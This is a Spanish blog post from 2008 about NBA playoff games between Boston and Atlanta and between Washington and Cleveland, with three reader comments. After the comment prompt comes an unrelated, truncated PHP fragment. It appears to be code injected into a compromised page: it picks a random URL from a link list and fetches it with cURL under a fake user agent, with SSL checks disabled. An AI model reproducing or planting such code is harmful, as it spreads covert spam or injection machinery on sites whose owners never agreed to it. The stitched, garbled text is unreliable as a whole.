Golpe de autoridad

01 de May de 2008 por txusma

Golpe de autoridad (ATL 85 – BOS 110)

Ninguna gracia le ha hecho a Garnett y compañía que 4 “mocosos” vestidos de rojo vinieran a poner en duda quien es el equipo más fuerte y más duro del Este. El Big Three ha saltado a la cancha con ganas de comerse a quien se pusiera por delante y lo han conseguido de manera sobrada. 15 puntos de ventaja al descanso y 25 al final, dejándose llevar incluso y reservándose para el que ha de ser el partido definitivo. Estamos seguros que el ex de Minnessota, ayudado por Paul Pierce por aquello de la antigüedad, habrá aleccionado perfectamente a sus compañeros en el vestuario y luego en el campo habrá sido el que más se ha exprimido y el que más ha luchado. Un claro ejemplo para los jóvenes que no pueden sino dejarse la piel en el campo viendo que su líder, de 32 años ya, no da ni una pelota por pérdida.

Jaque al Rey (WAS 88 – CLE 87)

Al Rey se le sublevan los súbditos. Cuando todo apuntaba que Cleveland pasaría, Caron Butler, con una bandeja a falta de 3 segundos para el final, daba la victoria a Washington y se llevaba de vuelta la eliminatoria a casa. Lebron está jugando bien (cerca del triple doble de nuevo) pero Ilgauskas aparte, sus compañeros no están rindiendo como se esperaba. El mega-traspaso a mediados de temporada que llevó a Ben Wallace, Delonte West, Wally Szcerbiack y Joe Smith a los Cavaliers y que parecía que era lo necesario para que Cleveland pudiera lucha de tu a tu con Boston, está resultando ser todo un fiasco. Wallace está demostrando que su cuento se está acabando y Delonte y Wally son demasiado erráticos e irregulares. En estas condiciones Lebron se sigue apoyando en el incombustible Zydrunas Ilgauskas y el base Daniel Gibson. Es posible que acaben derrotando a Washington pero hará falta algo más para acabar con los verdes.

Comenta

3 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Yo lo que no termino de entender es lo de la supuesta sanción que les iba a caer a más de uno de Boston por el broncón del otro día, cuando a otros equipos sí les han sancionado en situaciones similares.
    Ayer, desde luego, me sorprendió ver a todos en la cancha.

    De todos modos, ahora vuelven a ser visitantes tanto uno como otro y en partidos a cara de perro y con el cuchillo entre los dientes (vamos con los tópicos!!!) Vamos que van a haber ondonadas de leches tanto en un partido como en otro y que nadie se extrañe si se llega al 7º en una de las dos o incluso en las dos (en las 3 contando la de Detroit)

    Al final no sé qué puede pasar… pero ya de entrada, la premisa aquella de que el campeón del este iba a llegar más descansado a la final por una plácida primera ronda no va a ser así.

      Citar

  2. xapa_croack dice:
    #2

    Parece k arenas ya no jugara mas en todos los poffs, madre mia como esta su rodilla este año.

      Citar

  3. Viva_Dirk dice:
    #3

    A Bibby le está faltando ritmo a la hora de mover el balón, está tirando bien pero en la dirección anda flojo. No se le ha dado mucho bombo, pero el último cuarto de la 2ª victoria de Atlanta que hace Joe Johnson es escandaloso, ahí si que pareció un ‘autentico jugador franquicia’ que diria Txus.

    Ayer facil para Boston que cargaron a Joe con faltas en el primer cuarto y gozaron de muchas segundas oportunidades con el rebote ofensivo. Ojalá fuercen los Hawks es 7º.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>